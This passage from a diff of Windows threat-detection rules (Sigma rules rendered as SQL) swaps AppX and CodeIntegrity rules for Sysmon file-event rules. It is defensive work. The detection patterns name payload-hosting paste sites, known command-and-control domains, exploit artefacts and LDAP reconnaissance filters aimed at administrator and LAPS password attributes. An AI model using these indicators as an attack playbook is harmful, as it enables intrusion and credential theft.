TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "status": "test", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "Legitimate usage of \".pub\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" - ], - "filename": "win_appxdeployment_server_applocker_block.yml" - }, - { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" - ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" - }, - { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "falsepositives": [ - "Unknown (data set is too small; further testing needed)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" - ], - "filename": "win_wmi_persistence.yml" - }, - { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", - "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" - ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" - }, - { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" - ], - "filename": "win_ldap_recon.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" - ], - "filename": "win_codeintegrity_revoked_driver.yml" - }, - { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", - "tags": [ - "attack.execution" + "attack.t1574.001" ], "falsepositives": [ - "Antivirus products" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" - ], - "filename": "win_codeintegrity_blocked_driver_load.yml" - }, - { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' 